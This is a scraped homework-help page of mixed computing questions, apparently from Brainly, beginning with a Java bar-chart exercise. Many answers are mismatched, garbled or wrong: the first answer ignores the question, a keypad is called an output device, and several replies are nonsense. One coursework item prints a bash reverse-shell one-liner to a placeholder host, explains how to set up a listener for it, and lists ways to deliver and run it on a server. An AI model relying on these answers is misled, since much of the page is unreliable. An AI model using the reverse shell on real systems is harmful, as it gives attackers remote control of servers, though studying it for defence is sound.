Modify the BarChart program from Chapter 6 Exercise 13 to accept the number of points scored by each player in a season. The bar chart displays one asterisk for each 10 points scored by a player. For example, if a player has scored 48 points, then display 4 asterisks.
An example of the program is shown below:
Enter points earned for the season
by Art >> 10
by Bob >> 20
by Cal >> 30
by Dan >> 40
by Eli >> 50
Points for Season (each asterisk represents 10 points)
Art *
Bob **
Cal ***
Dan ****
Eli *****
import java.util.Scanner;
public class BarChart
{
public static void main (String[] args)
{
Scanner input = new Scanner(System.in);
int artPoints;
int bobPoints;
int calPoints;
int danPoints;
int eliPoints;
System.out.print("Enter points earned by Art >> ");
artPoints = input.nextInt();
System.out.print("Enter points earned by Bob >> ");
bobPoints = input.nextInt();
System.out.print("Enter points earned by Cal >> ");
calPoints = input.nextInt();
System.out.print("Enter points earned by Dan >> ");
danPoints = input.nextInt();
System.out.print("Enter points earned by Eli >> ");
eliPoints = input.nextInt();
System.out.println("\nPoints for Game\n");
drawChart("Art", artPoints);
drawChart("Bob", bobPoints);
drawChart("Cal", calPoints);
drawChart("Dan", danPoints);
drawChart("Eli", eliPoints);
}
public static void drawChart(String name, int points)
{
System.out.print(name + " ");
for(int x = 0; x < points; ++x)
System.out.print("*");
System.out.println();
}
}

Answers

Answer 1

There are four mistakes. public key phrase. In C, string is not a datatype. That'd be char. This.id and this.name both have undeclared identifiers.

The following program's output is 56. The code sample shown initializes x with 5 and y with 0. Since x++ is a post increment operator, the statement y=x++ will then assign the value 5 to y and increase the value of x. As a result, after this sentence, x will increase in value. The first print command will output the value of y, which is 5, and the second print command will output the value of x, which is 6, both without spaces. Therefore, 56 will be the output. Because we are using the post fix increment operator and increasing 33 to 34 when we call move Point(p,1,1), 33 is there because the value will be decreased later.

Learn more about Program's output here:

https://brainly.com/question/13321542

#SPJ4


Related Questions

Please have a look at the screenshot below

Please have a look at the screenshot below

Answers

C. Reliability

Because of the network and recovery time



Plz give brainliest

_____ work(s) with the hardware and control(s) the basic functioning of the computer.

Answers

Operating system work(s) with the hardware and control(s) the basic functioning of the computer.

What is the Operating system?

An operating system (OS) is a software program that manages and controls the resources of a computer. It acts as an intermediary between the computer's hardware and its software applications.

Note that the OS is responsible for managing and allocating the computer's memory, processing power, and storage. It also controls and manages input and output operations, such as keyboard input, mouse movement, and file access.

Learn more about Operating system from

https://brainly.com/question/22811693
#SPJ1

What is lossy compression

A. It is a technique that results in the loss of all files on a computer.

B. It is a technique that reduces the file size by permanently removing some data

C. It is a method of combining the memories of the ram and the rom

D. It is a method that stores data dynamically requiring more power

Answers

Answer:

B. It is a technique that reduces the file size by permanently removing some data

Answer:

B. It is a technique that reduces the file size by permanently removing some data

Explanation:

QUESTION 5 OF 30
Burnout can happen quickly when
working with multiple sysadmins
working overtime
working as the sole sysadmin

Answers

Answer:

Burnout can happen quickly when working with multiple sysadmins, working overtime, or working as the sole sysadmin.

Explanation:

25 Points !! HELP ASAP . DUE TOMORROW MORNING .

Imagine you are scrolling through your social media and you see these two links, which one would you click on? Why? Explain answer 2-3 sentences long .

25 Points !! HELP ASAP . DUE TOMORROW MORNING . Imagine you are scrolling through your social media and

Answers

Answer:

The Associated Press

Explanation:

Out of the two options presented, The Associated Press caught my attention more due to its compelling content. The content displayed is visually appealing and likely to pique one's curiosity, motivating one to seek further information.

improved pet app user

Answers

By using Internet new sources of input. Determine the information that the app gets from each source of input.

One of the most critical components found currently in IT existence is the user interface. Approximately 90 % of people are mobile and electronic equipment dependent.

Thus, software production was the idea that's happening. Thus, a better customer interface is required to boost output in application development. They have to think of it and create an app with consumers or the performance.

Learn more about internet on:

https://brainly.com/question/13308791

#SPJ1

The complete question will be

Help meeeee - Improved Pet App

Try out the improved version of the pet app that gives the user information about pet stores close by, which uses new sources of input. Determine the information that the app gets from each source of input.

User

Phone Sensors

Internet

In order to average together values that match two different conditions in different ranges, an excel user should use the ____ function.

Answers

Answer: Excel Average functions

Explanation: it gets the work done.

Answer:

excel average

Explanation:

what is python programming?

Answers

Answer:

Explanation:

Python is a popular programming language that lets you work quickly and integrate systems more effectively. It can be used for a wide range of tasks, including web development, data analysis, artificial intelligence, and more. Python is known for its readability and ease of use, making it a great language for beginners to learn. It has a large and supportive community of developers who contribute to its development and provide resources for learning and using the language.

Who takes Mindtap Web Design

Answers

Answer:

MindTap is a new personalized program of digital products and services that engages students with interactivity while also offering students and instructors choice in content, platform, devices, and learning tools. ... The customizable, cloud-based system is a web portal students log into to navigate via a dashboard.

Explanation:

MindTap for Minnick's Responsive Web Design with HTML 5 & CSS, 9th Edition is the digital learning solution that powers students from memorization to mastery. It gives you complete control of your course—to provide engaging content, to challenge every individual, and to build their confidence.

You work at a help desk tecthnician in a mid-sized business. As your organization has been growing, there has been an increase of issues dealing with malware, viruses, and other threats to the systems. There hasn't been a consistent means of securing the various data assets, PCs and network. Your IT Manager would like you to create a proposal in order to implement measures to combat malware, viruses, and other threats to the organizational data assets. The proposal should also address security concepts and mitigation strategies to keep the PCs and networks secure.

The organization has all of its workers in a single building but has multiple floors split up based on departments. All of the users are on Windows PCs with a mix of Windows 10, Windows 7 and Windows 8.1. The servers consist of a database server, file server, email server, web application servers as well as other business application servers. Due to the fact that the organization has multiple floors, most users currently use a wireless connection. Throughout the project, you will be building on your proposal document. Your proposal should address the following scenarios using the resources provided:
• Some users in your sales department have been noticing their browsers being "taken over". When they go on a particular site, they get directed to another site. This has only started happening when they were exploring some new products and have navigated to sites that may have installed malware on their browsers. Provide details of solutions that can be implemented to combat malware.
• In the HR department, they have been sharing files sent from recruiting agencies. One of the agencies has reached out as they noticed that one of the files they had sent to our HR department had a virus. Provide ways of implementing measures to combat these viruses.
• There have been an increased number of other issues in the organization in which the users need training on. In particular, the areas of phishing emails, personal mobile devices at work, removal media, and poor passwords have been problematic. Provide ways of implementing measures to deal with other issues such as phishing, mobile devices, removal media, and poor passwords.
In addition, in order to create consistency in terms of security concepts, your proposal should also address the following points:
• Apply the mitigation strategies to manage the PC issues listed above.
• Apply the security concepts to ensure the security of networks for wired and wireless networks.

Answers

Answer:

Most people don't have time to read this question

6. What will be drawn when we call fo?
def g():
Label("Hi!!, 150, 200, size=24).
def f():
Label("I'm happy", 225, 200, size=24)
[1 point]
O a. 'Hi!
O b. I'm happy
O c. I'm happy Hi!
O d. Hi! I'm happy

6. What will be drawn when we call fo?def g():Label("Hi!!, 150, 200, size=24).def f():Label("I'm happy",

Answers

Answer:

d, brainly wants this to be long so hdjddjd

Write a short quiz program which asks three true/false questions and stores the user's answers as booleans. At the end the program it should print the user's answers with the correct answers.

Note: you should use the same quiz questions and correct answers as the sample run below.

Sample run:

Java is a programming language, true or false?
true
Only numbers can be stored by variables in Java, true or false?
true
There are only 2 possible values which can be held by a boolean variable, true or false?
false
Question 1 - Your answer: true. Correct answer: true
Question 2 - Your answer: true. Correct answer: false
Question 3 - Your answer: false. Correct
AP CS A Unit 1: Lesson 3 - Coding Activity 3

Answers

this answering question interface is bleh

Write a short quiz program which asks three true/false questions and stores the user's answers as booleans.

The concept of boolean variables is that; variables declared as boolean type can only take any of two values. The variable can either be true or false. Such variable cannot take any other value apart from these two.

The short quiz program is as follows.

Please note that comments are used to explain difficult lines.

import java.util.*;

public class shortQuiz{

public static void main(String[] args) {

 Scanner input = new Scanner(System.in);

//This declares the variables that represent correct answers as boolean data type; the variables are also initialized

 boolean q1 = true, q2 = false, q3 = true;

//This declares the response to each question as boolean data type

 boolean q1response, q2response, q3response;

//This prints the first question

 System.out.print("Java is a programming language, true or false? ");

//This gets input for the first response

 q1response = input.nextBoolean();

//This prints the second question

 System.out.print("Only numbers can be stored by variables in Java, true or false? ");

//This gets input for the second response

 q2response = input.nextBoolean();

//This prints the third question

 System.out.print("There are only 2 possible values which can be held by a boolean variable, true or false? ");

//This gets input for the third response

 q3response = input.nextBoolean();

//This prints your first response, alongside the correct answer to the first question

 System.out.println("Question 1 - Your answer: "+q1response+". Correct answer: "+q1);

//This prints your second response, alongside the correct answer to the second question

 System.out.println("Question 2 - Your answer: "+q2response+". Correct answer: "+q2);

//This prints your third response, alongside the correct answer to the third question

 System.out.println("Question 3 - Your answer: "+q3response+". Correct answer: "+q3);

//The program ends here

}

}

See attached image for program sample run.

The above program initializes the correct answers using boolean variables. The correct answers are then printed, after the user answers the three questions.

Read more about boolean variables at:

https://brainly.com/question/16843003

Write a short quiz program which asks three true/false questions and stores the user's answers as booleans.

what is the origin of cellular phones

Answers

Answer:

The first handheld mobile phone was demonstrated by Martin Cooper of Motorola in New York City in 1973, using a handset weighing c. 2 kilograms (4.4 lbs).[2] In 1979, Nippon Telegraph and Telephone (NTT) launched the world's first cellular network in Japan.

Explanation:

i hope help you :)

mark brainlist

Question 11
What type of program would have a class named Student with objects called fulltime and partTime?

Answers

What type of program would have a class named Student with objects called fullTime and partTime?

A. machine language program

B. object-oriented program

C. markup language program

D. procedural language program

Answer:

B. object-oriented program

Explanation:

An object-oriented program or OOP is a type of program that uses the concepts of objects and methods.

Although they are quite broad, they also make use of classes and types.

Java, for instance makes use of OOP as they use classes and objects under those classes and name them anyhow they want.

Therefore, the correct answer is B

Object-oriented Program.

We are told that;

Class : students

Objects: Full time and part time.

This means the program is based on the concept of objects and Class.

Now, from knowledge of programming, the one that deals with objects and Class is called Object-oriented Program.

Examples of programming languages today that are object oriented are;

JavaScript, C++, and Python.

Where the program is used to structure  software programs into simple, but also  parts of code blueprints known as classes that are re-usable.

Read more at; brainly.com/question/17148984

problem description IT​

Answers

In IT, a problem description refers to a clear and concise explanation of an issue or challenge that needs to be resolved within a technology system or application.

How is this so?

It involves providing relevant details about the symptoms, impact, and context of the problem.

A well-written problem description outlines the specific errors, failures, or undesired behavior observed and provides enough information for IT professionals to analyze and identify potential solutions.

A comprehensive problem description is crucial for effective troubleshooting and problem-solving in the IT field.

Learn more about Problem Description at:

https://brainly.com/question/25923602

#SPJ1

After an organization experiences a significant data breach, the lead cyber technician is tasked with providing a presentation on various cyber-attacks. What types of attacks are associated with application attacks? (Select the best three choices.)

a. ARP Poisoning
b. Replay
c. Cross-site Scripting
d. Pass the Hash

Answers

The types of attacks that are associated with application attacks are:

b. Replay

c. Cross-site Scripting

d. Pass the Hash

What is the cyber-attack?

Cross-spot Scripting (XSS): This is a type of attack where an aggressor injects malicious law into a website or web use, which can therefore be executed in the consumer's browser. This maybe used to steal delicate information, in the way that login credentials or credit card numbers.

Replay: This is a type of attack place an attacker intercepts network traffic and therefore replays it later, allowing ruling class to perform conduct on behalf of the authentic user. This can be used to imitate the user and act unauthorized conduct.

Learn more about cyber-attack from

https://brainly.com/question/27665132

#SPJ1

Please help me, I need to turn this in before 12am. :(

Take a few moments and ask yourself about the value of a database. Then develop no less than two paragraphs considering... What can they really accomplish? Can you think of any industries that are actively using them? Are they challenging to learn? (or any other information you feel is prudent to the discussion).

Answers

Databases are essential tools for storing, organizing, and managing large amounts of data, providing valuable insights and serving as a foundation for software systems across industries.

Write a short note on databases and their uses.

Databases are an essential tool for storing, organizing, and managing large amounts of data. They allow for efficient retrieval and manipulation of data and can provide valuable insights for businesses and organizations.

In today's data-driven world, databases can accomplish a wide range of tasks. They can store customer information, inventory data, financial records, and more. Databases can be used for analysis and decision-making, such as identifying trends, forecasting future performance, and optimizing operations. They can also provide a foundation for applications and software systems, such as e-commerce platforms, CRM systems, and inventory management software.

Many industries actively use databases, including healthcare, finance, retail, and government. Healthcare organizations use databases to manage patient records and medical information, while financial institutions use them to manage transactions and account information. Retail companies use databases to track inventory and sales data, while government agencies use them to manage citizen records and public services.

While databases can be complex and challenging to learn, there are many resources available to help individuals and organizations develop the skills needed to use them effectively. Online courses, tutorials, and certifications are available, as well as consulting and support services from database vendors and experts. With the right training and resources, anyone can learn to use databases to their full potential.

To learn more about Databases, visit:

https://brainly.com/question/6447559

#SPJ1

Explain how the entity relationship (ER) model helped produce a more structured
relational database design environment.

Answers

The way that the entity relationship (ER) model helped produce a more structured relational database design environment is that

A database's primary entities and their relationships can be determined with the aid of an entity relationship model, or ERM. The role of the ERM components is easier to comprehend because they are graphically portrayed.

It is simple to translate the ERM to the tables and attributes of the relational database model using the ER diagram. The full set of needed database structures is generated by this mapping procedure, follows a set of clearly defined processes which are:

uses clearly defined images and rules to represent reality.the theoretical basisbeneficial for communicationTranslate to any DBMS type

How does the ER model aid in relational database design?

A visual representation of relational databases is an entity relationship diagram (ERD). Relational databases are modeled and designed using ERDs.

The Entity Relationship Model (ERM), which enables designers to perceive entities and connections visually, contributed to the creation of a more structured relational database design environment.

Therefore, Instead of defining the structures in the text, it is easier to understand them graphically.

Learn more about entity relationship (ER) model from

https://brainly.com/question/14424264
#SPJ1

With the help of the network, the attacker can obtain the shell or root shell of the remote server (Linux operating system-based) through the reverse shell attack, and then get full control of the server. The typical reverse shell instruction is as follows:

/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"

1) Please explain the meaning of 0,1,2,>, <, & represented in the above statement;
2) What does the attacker need to do on his machine in order to successfully get the shell information output on the server side? And please explain the meaning represented by /dev/tcp/server_ip/9090;
3) Combined with the above statement, explain the implementation process of reverse shell attack;
4) Combined with the relevant knowledge learned in our class, what attacking methods can be used to successfully transmit and execute the above reverse shell instruction on the server side?

Answers

1. 0 represents standard input (stdin), 1 represents standard output (stdout), 2 represents standard error (stderr), > is output redirection, < is input redirection, and & is used for file descriptor redirection.

2. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility.

3.Identify vulnerable system, craft reverse shell payload, deliver payload to target, execute payload to establish connection with attacker are methods for implementation.

4. Exploiting vulnerabilities, social engineering, planting malware/backdoors, compromising trusted user accounts can be used to execute the reverse shell instruction.

1. In the reverse shell instruction provided ("/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"), the symbols 0, 1, 2, >, <, and & represent the following:

0: It represents file descriptor 0, which is the standard input (stdin).

1: It represents file descriptor 1, which is the standard output (stdout).

2: It represents file descriptor 2, which is the standard error (stderr).

: It is the output redirection symbol and is used to redirect the output of a command to a file or device.

<: It is the input redirection symbol and is used to redirect input from a file or device to a command.

&: It is used for file descriptor redirection, specifically in this case, combining stdout and stderr into a single stream.

2. To successfully get the shell information output on the server side, the attacker needs to set up a listening service on their own machine. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility. The "/dev/tcp/server_ip/9090" in the reverse shell instruction represents the connection to the attacker's machine on IP address "server_ip" and port 9090. By specifying this address and port, the attacker creates a connection between their machine and the compromised server, allowing the output of the shell to be sent to their machine.

3. The reverse shell attack is typically performed in the following steps:

The attacker identifies a vulnerability in the target server and gains control over it.The attacker crafts a payload that includes the reverse shell instruction, which allows the attacker to establish a connection with their machine.The attacker injects or executes the payload on the compromised server, initiating the reverse shell connection.The reverse shell instruction creates a new shell on the compromised server and connects it to the attacker's machine, redirecting the shell's input and output streams to the network connection.Once the reverse shell connection is established, the attacker gains interactive access to the compromised server, obtaining a shell or root shell, and can execute commands as if they were directly working on the server itself.

4.  Successfully transmit and execute the reverse shell instruction on the server side, the attacker can use various attacking methods, including:

Exploiting a vulnerability: The attacker can search for known vulnerabilities in the target server's operating system or specific applications running on it. By exploiting these vulnerabilities, they can gain unauthorized access and inject the reverse shell payload.

Social engineering: The attacker may use social engineering techniques, such as phishing emails or deceptive messages, to trick a user with access to the server into executing the reverse shell payload unknowingly.

Malware or backdoor installation: If the attacker already has control over another system on the same network as the target server, they may attempt to install malware or a backdoor on that system. This malware or backdoor can then be used to launch the reverse shell attack on the target server.

Compromising a trusted user account: The attacker may target and compromise a user account with privileged access on the server. With the compromised account, they can execute the reverse shell instruction and gain control over the server.

It is important to note that carrying out such attacks is illegal and unethical unless done with proper authorization and for legitimate security testing purposes.

For more questions on Linux operating system-based

https://brainly.com/question/31763437

#SPJ11


3. Based on the code you created in this Unit, propose a way to re-use most of the code
(with different information in the variables like "city" and "rates) for a part of a similar app
that isn't related to parking at all. The app can be small-scale or large scale, but should be clearly connected to the code you’ve writted (you can defend your proposal if the connection is not immediately obvious).

Answers

One possible way to reuse the code for a similar app is to modify it for a hotel booking system. Instead of parking rates for different cities, the modified app could display room rates for different hotels in various cities.

The basic structure of the code can be kept the same, with adjustments made to the variable names, input fields, and calculations. The "city" variable can be replaced with a "hotel" variable, and the "rates" variable can be replaced with a "room rates" variable.

The user input can be modified to ask for the desired hotel and room type, and the app can display the available room rates for that selection.

To learn more about the booking system, follow the link:

https://brainly.com/question/28315659

#SPJ1

when jesus said it is written what was he making refference to​

Answers

do you mean when Jesu said it is finished When Jesus says it is finished he is referring to him dying for our sins

Answer:

He was referring to the Bible being finished.

Explanation:

The following question uses a robot in a grid of squares. The robot is represented as a triangle, which is initially facing toward the top of the grid. Consider the goal of modifying the code segment to count the number of squares the robot visits before execution terminates. Which of the following modifications can be made to the code segment to correctly count the number of squares the robot moves to?

Answers

The modifications that can be made to the code segment to correctly count the number of squares the robot moves to: option 1: inserting the statement count ← count + 1 between line 6 and line 7.

What exactly is a C code segment?

One of the sections of a program in an object file or in memory that includes executable instructions is referred to as a text segment, sometimes known as a code segment or simply as text.

An object file or the corresponding area of the virtual address space of the program that includes executable instructions is referred to as a code segment in computing, often known as a text segment or simply as text.

The only distinction that comes to mind is that you must close segments when using code segment while, as opposed to code and data segment/code segment directives. It's not required by code.

Learn more about code segment from

https://brainly.com/question/25781514
#SPJ1

See full question below

The following code segment moves the robot around the grid. Assume that n is a positive integer.

Line 1: count ←← 0

Line 2: REPEAT n TIMES

Line 3: {

Line 4:    REPEAT 2 TIMES

Line 5:    {

Line 6:       MOVE_FORWARD()

Line 7:    }

Line 8:    ROTATE_RIGHT()

Line 9: }

Consider the goal of modifying the code segment to count the number of squares the robot visits before execution terminates. Which of the following modifications can be made to the code segment to correctly count the number of squares the robot moves to?

inserting the statement count ← count + 1 between line 6 and line 7

Inserting the statement count ← count + 2 between line 6 and line 7

Inserting the statement count ← count + 1 between line 8 and line 9

Inserting the statement count ← count + n between line 8 and line 9

Summarize the history of artificial intelligence detailing its origin and future state in technology today.
Wrong answer will get reported

Answers

Scaled AI implementation can enhance team performance and strengthen corporate culture. Discover how BCG's AI-driven projects have aided in maximizing value for our clients. Learn About Our AI Products.

How does artificial intelligence work?

The replication of human intelligence functions by machines, particularly computer systems, is known as artificial intelligence. Expert systems, language processing, speech recognition, and machine vision are some examples of specific AI applications.

What fundamental principle underpins artificial intelligence?

Artificial intelligence is founded on the idea that intellect can be described in a way that makes it simple for a computer to duplicate it and carry out activities of any complexity. Artificial intelligence aims to emulate cognitive processes in humans.

To know more about artificial intelligence visit:

https://brainly.com/question/23824028

#SPJ1

Choose the correct vocabulary term from each drop-down menu
Education that focuses on skills that can be used in the workplace is
Creating curriculum around learning goals established by the training or learning department is
The continued pursuit of knowledge for either personal or professional reasons 16
Learning that focuses on goals established by the learner is

Answers

Answer:

The answer to this question is given below in the explanation section.

Explanation:

Education that focuses on skills that can be used in the workplace is work-based learning.

Creating curriculum around learning goals established by the training or learning department is formal learning.

The continued pursuit of knowledge for either personal or professional reasons is lifelong learning.

Learning that focuses on goals established by the learner is informal learning.

Answer:

work-based learning.

formal learning.

lifelong learning.

informal learning.

Explanation:

operating system and application software complete pc backup a few files to be transferred from one computer to another full length movie corporate data backup

Answers

Cloud computing is a control technique for system availability" as well as software complete pc backup a few files to be transferred from one computer to another.

What is cloud computing ?

The term cloud computing has been provides on-demand computer network services, which has including the storing data or the information and computing resources.

The definition has been often used to identify network infrastructure for the several web users, that's why the above choice is a correct and wrong choice can be described as it also needs in businesses with using their apps and servers but can't be removed, that's why it is wrong.

Therefore, Cloud computing is a control technique for system availability" as well as software complete pc backup a few files to be transferred from one computer to another.

Learn more about computer on:

https://brainly.com/question/21080395

#SPJ1

What type of program can you use to enter your java program?a) compiler.b) editor.c) spreadsheet.d) database.

Answers

Answer:

Editor

Explanation:

A compiler translates languages

A spreadsheet is a document in which data is arranged in columns and rows

A database is a structured set of data held in a computer

An editor allows you to, well, edit code

Hope this helps!

(Please mark Brainliest!)

Which human job is most similar to the role of a producer

Answers

Answer: Directors

Explanation:  directors create motion pictures, television shows, live theater, commercials, and other performing arts productions. directors work under a lot of pressure, and many are under stress to finish their work on time.  Work hours for producers and directors can be long and irregular.

Why do many question and answer sites require accounts to use and wont show you the answer unless you login? Like quora for example, I HAVE to use my main email just to know the answer to a simple question. I know its not school related but many of the sites for these questions are restricted by the school.

Answers

Answer:t depends on whether or not the website is secure and it's a well-known website. Or it could be a scam. Unfortunately we all have to worry about that now. If ...

4 answers

·

12 votes:

if you give them your email address along with your password of course t

Explanation:

Which robot component could be considered an output device?
A. A display screen
B. A keypad
C. A temperature sensor
D. An ultrasonic detector

Answers

Answer:

B. A keypad

Explanation:

B. A keypad I guess

Which describes the outlining method of taking notes?

It is easy to use in fast-paced lectures to record information.
It is the least common note-taking method.
It includes levels and sublevels of information.
It uses columns and rows to organize information.

Answers

Answer:

It includes levels and sublevels of information

Explanation:

The Outlining method of taking notes helps the writer to organize his ideas into levels and sublevels of information which gives the piece of writing an added structure.

This can be achieved by the use of the Arabic numbering system, Roman numerals or use of bullets.

Answer:

C : It includes levels and sublevels of information

Explanation:

Other Questions
When firms that make and sell similar products to the same customers merge, it is known as a ___________. Suppose you have a total of $2.25 in dimes and nickels and you have twice as many dimes as nickels. How much of each coin do I have? What is a in 5a + 3 = 18? Phillippe is an inside salesperson who earns a base annual salary of $24,000 plus a 5% commission on total sales that he makes during the pay period. During a semimonthly period, he made $27,500 in sales. What is Phillippe's gross pay for the period? (Do not round interim calculations. Round final answer to 2 decimal places.)A) $2,298.07B) $2,390.38C) $2,375.00D) $2,422.50 Determine whether the data are qualitative, quantitative discrete, or quantitative continuous: Weight of an apple ____The most common color of apples in a bag _____Number of apples in a two-pound bag _____ Cogeneration power plant10 tonnes per hour of superheated steam enters the high pressure turbine at 450C and is discharged isentropically until the pressure reaches 30 Bar. After exiting the high-pressure turbine, 1.5 tonnes per hour of steam is extracted to the open feedwater heater, and the remaining steam flows to the low-pressure turbine, where it expands to1 Bar. At the condenser, the steam is totally condensed. The temperature at the condenser's outflow is the same as the saturation temperature at the same pressure. The liquid is compressed to 5 Bar after passing through the condenser and then allowed to flow through the mixing preheater (a heat exchanger with 88% )where it is completely condensed. The preheated feed water will be fed into the heat exchanger through a second feed pump, where it will be heated and superheated to a temperature of 450C. In the winter, the overall process heating demand is assumed to be 1.2 MW while this power plant's electricity demand is 5.5 MWProvide schematic of power plant and determine the quantity of feed water and utilization factor. 10. DO YOU THINK THE JUDICIARY SYSTEM OF INDIA GIVES OPPORTUNITY FOR ALL THECITIZENS TO RAISE THEIR VOICE AGAINST THE CRIME AND JUSTICE IS DONE FAIRLY?GIVE REASONS AND WHAT WOULD YOU LIKE TO INCLUDE OR CHANGE IN OURCRIMINAL JUSTICE SYSTEM?It is a 3 marker pls answer ASAP! Cory is responding to the writing prompt below. examine a department of education advertising campaign that promotes literacy. analyze the campaign to discover the target audience and the advertising techniques used. then evaluate the effectiveness of these advertising techniques. write a formal essay in which you explain how the advertising campaign effectively promotes literacy to a range of audiences. which is the best main topic for his response essay? a summary of the goals of the department of education a description of the advertising campaigns target audience an analysis of the impact of the advertising campaign an argument for why literacy is important HELP HURRY!!!! Simplify. 15(2+3) Enter your answer in the box. The mean and median of a data set are both measures of center, standard deviation, range, or variation? which territory was not acquired by the u.s. as a result of the treaty of paris? Measure the length of the line with the amount of uncertainty. Be careful to look at the required label. A= __cmB= __mmC= __cmD= __mm is the type of competition that occurs in a competitive market without identical producers.MonopolisticPure competitionAn oligopoly HELP PLEASE .. The text on the left is what part of "if"?How many lines does each stanza in the poemcontain? A newly created design business, Teri's Art, is finishing its first year of operations. During the year, credit sales were $40,000 and collections of credit sales were $34,000. One account for $650 was written off. Teri's Art uses the agingofreceivables method to account for bad debts expense. It has estimated $250 as uncollectible at yearend. What is the amount of the Bad Debts Expense for the first year of operations? What is Freud's term for the unconscious efforts by the ego to deny or distort reality for the purpose of protecting itself when conflict becomes too intense? oFalse cognitions oCoping techniques oDisordered thinking oDefense Mechanisms I need to know all the indicator and all the categories too What caused the start of the Dark Ages? Downfall of Rome and the destruction of their knowledge. Part D There is a structure for CH2CHCHCH2CHCH3 with a double bond between the first (from left to right) and the second carbons and a chlorine atom attached to the third and the fifth carbon. Spell out the full name of the compound. The demand function for a certain make of replacement catridges for a water purifier is given by the following equation where p is the unit price in dollars and x is the quantity demanded each week , measured in units of a thousand .p = -0.01 x^2 0.2 x + 9 Determine the consumers' surplus if the market price is set at $6/cartridge . (Round your answer to two decimal places.)